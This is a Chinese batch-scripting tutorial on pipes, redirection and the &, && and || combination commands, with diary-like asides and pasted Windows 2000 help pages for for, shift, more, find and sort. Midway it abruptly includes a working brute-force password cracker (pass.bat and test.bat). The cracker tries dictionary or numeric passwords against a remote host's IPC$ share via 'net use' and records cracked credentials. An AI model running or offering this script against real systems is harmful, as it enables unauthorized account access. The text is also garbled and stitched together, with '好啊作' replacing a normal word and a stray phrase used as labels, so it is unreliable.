但是很可惜,等到下午再去的時候,圖書館樓梯口已經立了一個牌子,上面寫着out of service----人家這學期的工作結束了。於是回到宿舍打算繼續寫第四章,正在這時又得到一個“振奮人心”的消息:期末考試有一科掛了,而且是全班第一----這一門整個班裏就掛了我一個。鬱悶的情緒剎那間涌上心頭,整個世界彷彿都變成黑的了。食堂和小賣部已經陸續關門,學校裏的人越來越少,迎面過來的幾個同學也都一身行李,忙碌着準備回家過年,內心的孤寂和失落如同夏日裏暴雨前的烏雲,迅速而不可抗拒的佔領了心裏每一個角落。迎着一月的冷風我一個人在天橋上發呆,還能怎麼樣,連期末考試都應付不了的失敗男人。
“課間休息”時間好象長了點,呵呵,上課了!從這一章開始,將詳細介紹批處理中常用的幾個組合命令和管道命令。這些命令雖然不是必須的,如同愛一個人時不一定非得每天去陪,但如果少了這個過程,事情就會變的複雜而不完美,所以我認爲管道命令和組合命令是批處理的調味劑,幾乎是少不了的。
下面從管道命令講起。常用的管道命令有以下這些:|、>、>>
11、|
這個命令恐怕大家不是很陌生,經常好啊作DOS的朋友都應該知道,當我們查看一個命令的幫助時,如果幫助信息比較長,一屏幕顯示不完時DOS並不給我們時間讓我們看完一屏幕再翻到另一屏幕,而是直接顯示到幫助信息的最後。如在提示符下輸入help回車時,就會看到當前DOS版本所支持的所有非隱含命令,但你只能看到最後的那些命令,前面的早就一閃
而過了,如何解決這個問題?看例十三:
help | more
回車後會發現顯示滿一屏幕後就自動暫停,等候繼續顯示其他信息。當按寫回車時,變成一個一個的出現;按下空格鍵時一屏幕一屏幕顯示,直到全部顯示完爲止;按其他鍵自動停止返回DOS。
爲什麼會出現上述現象?答案很簡單,這裏結合了管道命令|和DOS命令more來共同達到目的的。這裏先簡單介紹一下help命令和more命令,對理解|命令的用法有很大幫助。
11.1、help命令。其實這個命令是不需要多說的,但在上述例子中help命令的用法比較特殊,直接在DOS提示符下輸入help命令,結果是讓DOS顯示其所支持的所有非隱含命令,而在其他地方用help命令,如輸入net help回車,則是顯示net命令的幫助信息。
11.2、more命令。可能很多朋友以前就沒有接觸過這個命令,這個命令在Linux下的用處非常廣泛,也是管道命令之一。大家可以找一篇比較長的文章(a.txt)在DOS提示符下輸入如下兩個命令去比較一下差別:more a.txt和type a.txt。利用more命令,可以達到逐屏或逐行顯示輸出的效果,而type命令只能一次把輸出顯示完,最後的結果就是隻能看到末尾的部分。在例十三裏,more命令的作用就是讓輸出的信息逐屏或逐行顯示。
看到這裏,你是否已經能隱約感受到了|命令的作用了?沒錯,它的作用,就是把前一命令的輸出當後一命令的輸入來用的。在例十三裏,前一命令的輸出,就是help命令執行後顯示的DOS所支持的所有非隱含命令,而這個結果剛好做了後一命令more的輸入。所以例十三和下面的例十四是等效的:
help > a.txt
more a.txt
del a.txt
這裏利用另一管道命令>生成了一個a.txt文件作爲中間環節,在用more命令查看a.txt文件後再刪除a.txt文件(例十三的所有好啊作是在內存中進行的,不生成文件)。可以看出,正確使用管道命令|可以帶來事半功倍的效果。
結合例十三和例十四,以及前面的例九再體會一遍:|命令的作用,就是讓前一命令的輸出當做後一命令的輸入。
12、>、>>
這兩個命令的效果從本質上來說都是一樣的,他們都是輸出重定向命令,說的通俗一點,就是把前面命令的輸出寫入到一個文件中。這兩個命令的唯一區別是,>會清除掉原有文件中的內容後把新的內容寫入原文件,而>>只會另起一行追加新的內容到原文件中,而不會改動其中的原有內容。例十五:
複製代碼 代碼如下:
echo @echo off > a.bat
echo echo This is a pipeline command example. >> a.bat
echo echo It is very easy? >> a.bat
echo echo Believe your self! >> a.bat
echo pause >> a.bat
echo exit >> a.bat
依次在DOS提示符下輸入以上各行命令,一行一個回車,將在當前目錄下生成一個a.bat文件,裏面的內容如下:
複製代碼 代碼如下:
@echo off
echo This is a pipeline command example.
echo It is very easy?
echo Believe your self!
pause
exit
看到這裏,你得到了多少信息?1、可以直接在DOS提示符下利用echo命令的寫入功能編輯一個文本,而不需要專門的文本編輯工具;2、管道命令>和>>的區別如上所述。如果這裏只用>命令來完成上面好啊作,最後也會生成一個a.bat,但裏面的內容就只剩下最後一行exit了。所以>和>>一般都聯合起來用,除非你重定向的輸出只有一行,那麼就可以只用>了。結合例一再仔細體會輸出重定向管道命令>和>>的用法。
13、<、>&、<&
這三個命令也是管道命令,但它們一般不常用,你只需要知道一下就ok了,當然如果想仔細研究的話,可以自己查一下資料。
<,輸入重定向命令,從文件中讀入命令輸入,而不是從鍵盤中讀入。
>&,將一個句柄的輸出寫入到另一個句柄的輸入中。
<&,剛好和>&相反,從一個句柄讀取輸入並將其寫入到另一個句柄輸出中。
關於這三個管道命令的舉例,在後面批處理腳本的精妙應用中還將涉及到。
下面介紹組合命令:&、&&、||
組合命令,顧名思義,就是可以把多個命令組合起來當一個命令來執行。這在批處理腳本里是允許的,而且用的非常廣泛。它的格式很簡單----既然現在已經成了一個文件了,那麼這多個命令就要用這些組合命令連接起來放在同一行----因爲批處理認行不認命令數目。組合命令的作用,就如同給愛人陪不是,說一句是說,說十句也是說,不一次把好話都說了出來,效果可能會好些----當然得排除一種特殊情況:這些話是否有先後順序,有些話是否可以同時說。在批處理腳本里也一樣,有些時候某些命令是不能同時執行的,後面給你說。
剛剛又送走了一個同學,人去樓空的感覺越來越明顯,望着空蕩蕩的牀鋪,平日裏喧鬧的宿舍就只剩下我一個人了,整個世界只有那個平時令人非常討厭的老鼠這時候才顯得可愛起來----只有它會陪着我在這不敢開燈的漆黑夜裏----一個連期末考試都應付不了的失敗男人。失敗!我感到快要呼吸不過來,這種失敗的壓力簡直令我窒息,簡直讓我的手接收不到大腦的信號,簡直讓這篇未完成的教程夭折。但我能怪誰?
忙碌了一學期要過年了卻掛了科,失敗;掛了科也倒罷了,竟然一個人拖全班的後退,失敗中的失敗;更失敗的,是在這最失落的時候,竟然找不到一個人可以傾訴;然而最失敗的,是突然發現自己竟然如此脆弱,如此耐不住寂寞。不過這倒也解開了心中疑惑很久的一個問題:爲什麼明知道那段情是一個旋渦卻還心甘情願的往裏面跳----這就是青春,風一樣的年齡,火一樣不安的心。不再愛了,我不要再一個人的時候苦苦等待;不再愛了,我不要在你給的囚籠裏憐憫的愛;不再愛了,我不要在別人的視線裏如此可笑;不再愛,我不再愛。就算塌下來,我也要一個人扛着,頭不能低腰不能彎,不能喘息不能傾訴,因爲雖然失敗,但還是男人,是男人就不能向困難低頭!
14、&
這可以說是最簡單的一個組合命令了,它的作用是用來連接n個DOS命令,並把這些命令按順序執行,而不管是否有命令執行失敗。例十六:
copy a.txt b.txt /y & del a.txt
其實這句和move a.txt b.txt的效果是一樣的,只不過前者是分了兩步來進行的(在後面還將涉及到具體使用哪種方法的問題)。這個命令很簡單,就不多費口舌了,唯一需要注意的一點是,這裏&兩邊的命令是有執行順序的,從前往後執行 。
15、&&
切記,這裏介紹的幾個命令都是組合命令,所以他們前後都必須都有其他命令(要不如何組合?)。這個命令也不例外,它可以把它前後兩個命令組合起來當一個命令來用,與&命令不同之處在於,它在從前往後依次執行被它連接的幾個命令時會自動判斷是否有某個命令執行出錯,一旦發現出錯後將不繼續執行後面剩下的命令。這就爲我們自動化完成一些任務提供了方便。例十七:
dir 文件://1%/www/user.mdb && copy 文件://1%/www/user.mdb e:\backup\www
如果遠程主機存在user.mdb,則copy到本地e:\backup\www,如果不存在當然就不執行copy了。這句對搞網管的朋友是否有點用呢?呵呵。其實它和下面這句的作用是一樣的:
if exist 文件://1%/www/user.mdb copy 文件://1%/www/user.mdb e:\backup\www
至於你喜歡用哪個就隨便了,我沒辦法判斷dir和if兩個命令哪一個執行效率更高,所以不知道用哪個更好,呵呵。
你是否還記得“有些命令是不能同時執行的”?你是否相信這句話?當然得相信,不信就給你出道題:把C盤和D盤的文件和文件夾列出到a.txt文件中。你將如何來搞定這道題?有朋友說,這還不是很easy的問題嗎?同時執行兩個dir,然後把得到的結果>到a.txt裏就ok了嘛,看例十八:
dir c:\ && dir d:\ > a.txt
仔細研究一下這句執行後的結果,看看是否能達到題目的要求!錯了!這樣執行後a.txt裏只有D盤的信息!爲什麼?就因爲這裏&&命令和>命令不能同時出現一個句子裏(批處理把一行看成一個句子)!!組合命令&&的優先級沒有管道命令>的優先級高(自己總結的,不妥的地方請指正)!所以這句在執行時將本分成這兩部分:dir c:\和dir d:\ > a.txt,而並不是如你想的這兩部分:dir c:\ && dir d:\和> a.txt。要使用組合命令&&達到題目的要求,必須得這麼寫:
dir c:\ > a.txt && dir d:\ >> a.txt
這樣,依據優先級高低,DOS將把這句話分成以下兩部分:dir c:\ > a.txt和dir d:\ >> a.txt。例十八中的幾句的差別比較特殊,值得好好研究體會一下。
當然這裏還可以利用&命令(自己想一下道理哦):
dir c:\ > a.txt & dir d:\ >> a.txt
16、||
這個命令的用法和&&幾乎一樣,但作用剛好和它相反:利用這種方法在執行多條命令時,當遇到一個執行正確的命令就退出此命令組合,不再繼續執行下面的命令。題目:查看當前目錄下是否有以s開頭的exe文件,如果有則退出。例十九:
@echo off
dir s*.exe || exit
其實這個例子是有破綻的,你看出來了嗎?其實很簡單,自己試試就知道了嘛:如果存在那個exe文件,就退出;如果不存在那個exe文件,也退出!爲什麼?因爲如果不存在那個.exe文件,則前一條命令dir s*.exe執行肯定是不成功的,所以就繼續執行exit,自然就退出了,呵呵。那麼如何解決題目給出的問題呢?看例二十:
@echo off
dir s*.exe || echo Didn't exist file s*.exe & pause & exit
這樣執行的結果,就能達到題目的要求,是否存在s*.exe將出現兩種結果。這裏加暫停的意思,當然是讓你能看到echo輸出的內容,否則一閃而過的窗口,echo就白寫了。
給出兩個更好研究優先級(同時也是更難理解)的腳本,仔細研究它們的區別,以便徹底理解各種命令的優先級順序,對以後自己利用這些命令寫腳本有很大的好處----不會出錯!OK,請看例二十一和例二十二:
例二十一:
@echo off
dir a.ttt /a & dir a.txt || exit
例二十二:
@echo off
dir a.ttt /a && dir a.txt || exit
警告:患有心腦血管病的朋友請不要研究以上兩例,否則輕者頭大如鬥,重者血管爆裂。任何人由於研究這兩個腳本的區別而造成的任何事故由自己或其合法監護人負責,與本人和本論壇無關。特此警告!
有關管道命令和組合命令就大概介紹到這裏了,不知道聰明的你是否理解?呵呵,能理解就成天才了,除非你以前就已經掌握!千萬別小看了這幾個鬼命令,大棒槌是我的說,簡直就不是人學的東西!但我還是靜下心來研究了一番,最後得出的結論如上所述,已經一點不剩的交給你了,希望你好好收藏並消化吸收,當然有錯誤被你發現了,或者不完整的地方被你看出來了,請趕緊告訴我一聲!
這幾個命令真的把我的頭都搞大了。在網上有一篇流傳很廣的批處理教程:“簡明批處理教程”,雖然說的比較全面,但看起來很不過癮。在對for等命令介紹時就一個for /? > a.txt & start a.txt完事了(當然這一點上我不能說人傢什麼,畢竟我連for /?都沒給出),而對上述管道命令和組合命令、以及這篇教程以後將講到的用批處理好啊作註冊表等方面根本沒有介紹。我之所以花整整一章來講管道命令和組合命令,是因爲他們纔是批處理的精華和靈魂,能否正確利用好這幾個命令,是能否掌握批處理的前提條件。如for、set等DOS命令的問題,可以從DOS的角度出發專門有針對性的學習,但有關這幾個命令的問題,卻是不容易精通掌握的----他們之間的關係太複雜了!
將下列代碼存爲bat文件
1、如果用字典破解:pass.bat 字典文件路徑及名稱 主機 用戶名
2、如果用數字破解:pass.bat 起始數 步長 結束數 主機 用戶名
密碼破解出來之後,存放於c:\pass.txt文件裏面。
將下列代碼存爲pass.bat文件
複製代碼 代碼如下:
@echo off
echo ------------------------------------------------------------------- >>c:\pass.txt
echo ------------------------------------------------------------------- >>c:\pass.txt
date /t >>c:\pass.txt
time /t >>c:\pass.txt
echo 破解結果: >>c:\pass.txt
if "%6"=="1" goto 大棒槌是我的說2
:大棒槌是我的說1
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:大棒槌是我的說2
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit
將下列代碼存爲test.bat
net use \\%1\ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命令執行返回結果,net use成功返回0,失敗返回2
:answer0
echo 遠程主機:"%1" >>c:\pass.txt
echo 用 戶:"%3" >>c:\pass.txt
echo 密 碼:%2 >>c:\pass.txt
net use \\%1\ipc$ /delet
exit
:answer2
For
對一組文件中的每個文件運行指定的命令。
可以在批處理程序中或直接從命令提示符使用 for 命令。
要在批處理程序中使用 for 命令,請使用以下語法:
for %%variable in (set) docommand [command-parameters]
要在命令提示符下使用 for,請使用以下語法:
for %variable in (set) do command [command-parameters]
參數
%%variable 或 %variable
代表可替換的參數。for 命令使用在 set 中指定的每個文本字符串替換 %%variable(或 %variable),直到此命令(在command-parameters 中指定)處理所有的文件爲止。使用 %% variable 在批處理程序中執行 for 命令。使用 %
variable 通過命令提示符執行 for 命令。變量名區分大小寫。
(set)
指定要用指定的命令處理的一個或多個文件或文本字符串。需要括號。
command
指定要在指定的 set 所包含的每個文件上執行的命令。
command-parameters
指定要用於指定命令(如果指定的命令要使用任何參數或開關)的任何參數或開關。
如果啓用了命令擴展(Windows 2000 中的默認設置),將支持 for 命令的其他形式。
For 命令的其他形式
如果啓用了命令擴展,將支持如下 for 命令的其他格式:
只限於目錄
for /D [%% | %]variable in (set) docommand [command-parameters]
如果 set 包含通配符(* 和 ?),則指定與目錄名匹配,而不是文件名。
遞歸
for /R [[drive :]path] [%% | %]variable in (set) docommand [command-parameters]
進入根目錄樹[drive:]path,在樹的每個目錄中執行 for 語句。如果在 /R 後沒有指定目錄,則假定爲當前目錄。如果
set 只是一個句號 (.) 字符,則只列舉目錄樹。
迭代
for /L [%% | %]variable in (start,step,end) do command [command-parameters]
集合是一系列按步長量劃分的、從頭到尾的數字。這樣,(1,1,5) 將生成序列 1 2 3 4 5,而 (5,-1,1) 將生成序列 (5
4 3 2 1)。
文件解析
for /F ["options"] [%% | %]variable in (filenameset) do command [command-parameters]
for /F ["options"] [%% | %]variable in ("literal string") do command[command-parameters]
for /F ["options"] [%% | %]variable in ('command') do command [command-parameters]
或者,如果出現 usebackq 選項:
for /F ["options"] [%% | %]variable in (filenameset) do command [command-parameters]
for /F ["options"] [%% | %]variable in ('literal string') do command [command-parameters]
for /F ["options"] [%% | %]variable in (`command`) docommand [command-parameters]
filenameset 參數指定一個或多個文件名稱。在繼續到 filenameset 中的下一個文件之前,每個文件都會被打開、讀取和處理。
過程由讀取文件、分成獨立的文本行及然後將每行解析成零個或更多個令牌組成。然後使用設置爲找到的一個或多個令牌字符串的變量值(或多個值)集合調用 for 循環體。默認情況下,/F 傳遞每個文件每一行的第一個空白分隔符號。
跳過空行。通過指定可選的“options”參數可以覆蓋默認的解析行爲。這是一個引用字符串,它包含一個或多個關鍵字
以指定不同的解析選項。關鍵字是:
關鍵字 說明
eol=c 指定行尾註釋字符(只一個字符)
skip=n 指定在文件的開頭跳過的行數。
delims=xxx 指定定界符集合。這將替換空格和製表符的默認分隔符集。
tokens=x,y,m-n 指定將令牌從每行傳遞到每個反覆的正文。這將導致分配其他變量名。m-n 格式是一個範圍,指定從mth 到 nth 的令牌。如果在令牌 = 字符串中最後一個字符是星號,則將分配附加的變量,並在解析最後一個令牌後在行
上接收剩餘的文本。
usebackq 指定將右引號字符串作爲命令執行,單引號字符串是文字字符串命令,您可以使用雙引號包括 filenameset 中的文件名。
變量替換
此外,已經增強了 for 變量引用的替換修改程序。現在可以使用下列可選的語法(對於任何變量 I):
變量(使用修改程序) 說明
%~I 展開刪除了周圍的任何引號 (") 的 %I
%~fI 將 %I 展開到完全合格的路徑名
%~dI 只將 %I 展開到驅動器號
%~pI 只將 %I 展開到路徑
%~nI 只將 %I 展開到文件名
%~xI 只將 %I 展開到文件擴展名
%~sI 展開路徑以只包含短名稱
%~aI 將 %I 展開到文件的文件屬性
%~tI 將 %I 展開到文件的日期/時間
%~zI 將 %I 展開到文件大小
%~$PATH:I 搜索 PATH 環境變量所列出的目錄,並將 %I 展開開到第一個找到結果的全部合格名稱。如果沒有定義環境變量名,或搜索後沒有找到文件,則此修改程序將擴展爲空字符串。
修改程序可以合併以獲得複雜的結果:
變量(使用合併的修改程序) 說明
%~dpI 只將 %I 展開到驅動器號和路徑
%~nxI 只將 %I 展開到文件名和擴展名
%~fsI 將 %I 展開到只包含短名稱的完整路徑名
%~dp$PATH:I 在 PATH 環境變量所列出的目錄中搜索 %I,並展開到第一個找到結果的驅動器號和路徑
%~ftzaI 將 %I 擴展到與 dir 相似的輸出行
注意
在上述範例中,%I 和 PATH 可被其他有效值替換。通過有效的 for 變量名終止 %~ 語法。
使用大寫變量名(例如 %I)可以使代碼更具可讀性,並且避免與不區分大小寫的修改程序混淆。
Shift
更改批處理文件中可替換參數的位置。
shift
啓用命令擴展(Windows 2000 中的默認設置)後,shift 命令支持 /n 開關,該開關通知命令在第 n 個參數處開始更改,n 可以是從 0 到 8 的任何一個值。例如,
SHIFT /2
將 %3 改爲 %2,將 %4 改爲 %3 等等,而 %0 和 %1 保持不變。
篩選器命令
篩選器命令可以幫助您排序、查看和選擇部分命令輸出結果。
通過篩選器命令傳遞信息
篩選器命令可以劃分、重排以及提取通過的部分信息好啊作。Windows 2000 有三個篩選器命令:
more 命令每次顯示一屏文件內容或命令輸出。
find 命令在文件和命令輸出中搜索指定字符。
sort 命令按字母順序排列文件和命令輸出。
要將輸入從文件發送到篩選器命令,請使用小於符號 (<)。如果要篩選器命令從其他命令獲得輸入,請使用管道 (|)。
使用 more 命令來控制屏幕顯示
more 命令每次一屏地顯示文件的內容或命令輸出。例如,下面的 more 命令每次顯示一屏 List.txt 文件的內容:
more < list.txt
信息顯示一屏後,會出現字“More”。要繼續顯示下一屏,請按鍵盤上任意鍵。要停止命令且不查看詳細信息,請按CTRL+C 鍵。
如果使用產生多屏輸出的命令,more 將十分有用。例如,假設定要查看硬盤的目錄樹。如果 Windows 2000 不能將目錄在一屏內全部顯示出來,請使用帶管道號 (|) 和 more 命令的 tree 命令,如下例所示:
tree c:\ | more
tree 命令的第一屏輸出被顯示,後跟詞“More”。Windows 2000 暫停,直到用戶按鍵盤上的任意鍵爲止(PAUSE 鍵除外)。
使用 find 命令搜索文本
find 命令在一個或多個文件中搜索指定文本。Windows 2000 顯示每個包含該文本的行。find 命令可以用作篩選器命令或者標準的 Windows 2000 命令。有關將 find 用作標準的 Windows 2000 命令的信息,請單擊“相關主題”列表中的
find。
要將 find 當作篩選器命令使用,請包含小於符號 (<) 和搜索的文件名。當輸入文件名時,請記住搜索要區分大小寫。
例如,下面的命令查找文件 Trade.txt 中所有的“Pacific Rim”字符串:
find "Pacific Rim" < trade.txt
要保存 find 命令的輸出而不是顯示輸出,請使用大於號 (>) 和要存儲輸出的文件名。例如,下面的命令查找文件
Trade.txt 中所有的“Pacific Rim”字符串,並將結果保存在 Nwtrade.txt 文件中:
find "Pacific Rim" < trade.txt > nwtrade.txt
對文本文件排序
sort 命令按字母順序排列文本文件或命令的輸出。例如,可以使用以下命令對 List.txt 文件的內容進行排序,並在屏幕上顯示結果:
sort < list.txt
在此範例中,sort 命令對 List.txt 文件的行進行排序並顯示結果,但不更改文件。要保存 sort 命令的輸出而不是顯示輸出,請在命令中包含大於號 (>) 和文件名。例如,可以使用以下命令對 List.txt 文件的行按字母順序排序,並將結果存到 Alphlist.txt 文件中:
sort < list.txt > alphlist.txt
要排序命令的輸出,請鍵入後面帶有管道 (|) 和 sort 命令的命令。例如,下面的命令對 find 命令的輸出結果進行排序:
find "Jones" maillst.txt | sort
在鍵入該命令時,Windows 2000 按字母順序列出在其中出現“Jones”的行。
帶重定向符的合併命令
可以將篩選器命令、其他命令和文件名合併以生成自定義命令。例如,可以使用以下命令存儲包含“LOG”字符串的文件名:
dir /b | find "LOG" > loglist.txt
Windows 2000 通過 find 過濾器命令發送 dir 命令的輸出並將包含字符串“Log”的文件名存儲在 Loglist.txt 文件中。將結果存儲爲文件名列表(如,A.log、Logdat.svd 和 Mylog.bat)。
要在相同命令中使用多個篩選器,請使用管道 (|) 分隔篩選器。例如,下面的命令搜索 C 盤上的每個目錄以查找包含“Log”字符串的文件名,並且每次顯示一屏:
dir c:\ /s /b | find "LOG" | more
因爲使用管道 (|),Windows 2000 通過 find 命令發送 dir 命令的輸出結果。find 命令只選擇包含字符串“Log”的文件名。more 命令每次一屏地顯示 find 命令選擇的文件名。
More
每次顯示一個輸出屏幕。該命令通常用於查看長文件。可以單獨使用此命令,或者使用它控制其他命令的輸出,例如
type 命令。當顯示填充可用的查看區域時將出現 more 提示,用戶可以輸入許多命令來控制查看文件其餘部分的方式。
command name | more [/c] [/p] [/s] [/tn] [+n]
more [[/c] [/p] [/s] [/tn] [+n]] < [drive:][path] filename
more [/c] [/p] [/s] [/tn] [+n] [files]
參數
[drive:][path] filename
指定要顯示的文件。
command name
指定將顯示其輸出的命令。
/c
顯示頁面前清除屏幕。
/p
擴展換頁符。
/s
將多個空白行更改爲一個空白行。
/tn
將製表位更改爲 n 個空格
+n
顯示由 n 指定的行開始的第一個文件。
files
指定要顯示的文件列表。用空格分隔文件名。
More 子命令
以下命令在 more 提示 (-- More --) 下接受。
關鍵字 好啊作
space 顯示下一頁。
ENTER 顯示下一行。
F 顯示下一個文件。
q 退出。
? 顯示可用命令。
= 顯示行號。
P n 顯示以下 n 行。
S n 跳過下面 n 行。
Find
在一個文件或多個文件中搜索指定的文本字符串。
當搜索到指定的文件後,find 將顯示出包含指定字符串的所有行。
find [/v] [/c] [/n] "string" [[drive:][path]filename[...]]
參數
/v
顯示未包含指定字符串的所有行。
/c
只顯示包含指定字符串的行數。
/n
將文件行號置於每行開頭。
/I
指定搜索不區分大小寫。
"string"
指定要搜索的字符組。必須將 string 的文本包括在引號中。
[drive:][path] filename
指定要在其中搜索指定字符串的文件的位置和名稱。
Sort
讀取輸入、排序數據並將結果寫到屏幕、文件和其他設備上。
sort [/r] [/+n] [/m kilobytes] [/l locale] [/rec characters] [[drive1:][path1]filename1] [/t [drive2:]
[path2]] [/o [drive3:][path3]filename3]
[command |] sort [/r] [/+n] [/m kilobytes] [/l locale] [/rec characters] [[drive1:][path1]filename1] [/t
[drive2:][path2]] [/o [drive3:][path3]filename3]
參數
/r
顛倒排序順序,即從 Z 到 A 排序,然後從 9 到 0 排序。
/+n
指定字符位置號 n,sort 在此處開始每次比較。例如,/+3 表示每次比較在每行的第三個字符開始。少於 n 個字符的行在其他行之前排序。默認情況下,比較在每行的第一個字符開始。
/m kilobytes
指定用於排序的主內存數量,按千字節 (KB) 計。使用的內存最小值總是 160 KB。如果指定了內存大小,則無論有多少主內存可用,指定的確切數量(但至少 160 KB)的內存將用於排序。
如果輸入輸出均爲文件,在沒有指定大小時,默認最大內存大小爲可用主內存的 90%,否則爲主內存的 45%。默認設置通常會產生最佳的性能。
/l locale
替代由系統默認區域設置定義的字符排序順序;即在安裝 Windows 2000 時選擇的語言和“國家(地區)”。目前,默認區域設置唯一的備用選項就是“C”區域設置,該區域設置比自然語言排序快,根據二進制編碼對字符排序。
/rec characters
指定記錄或輸入文件的行中的最多字符數(默認值爲 4096,最大值爲 65535)。
[drive1:][path1]filename1
指定要排序的文件。如果沒有指定文件名,則對標準輸入排序。指定輸入文件比將同一文件作爲標準輸入重定向速度快。
/t [drive2:][path2]
指定保留 sort 命令工作存儲的目錄路徑,防止數據不能裝入主內存。默認爲使用系統臨時目錄。
/o [drive3:][path3]filename3
指定要存儲排序後的輸入的文件。如果沒有指定,數據將寫入標準輸出。指定輸出文件比將同一文件作爲標準輸出重定向速度快!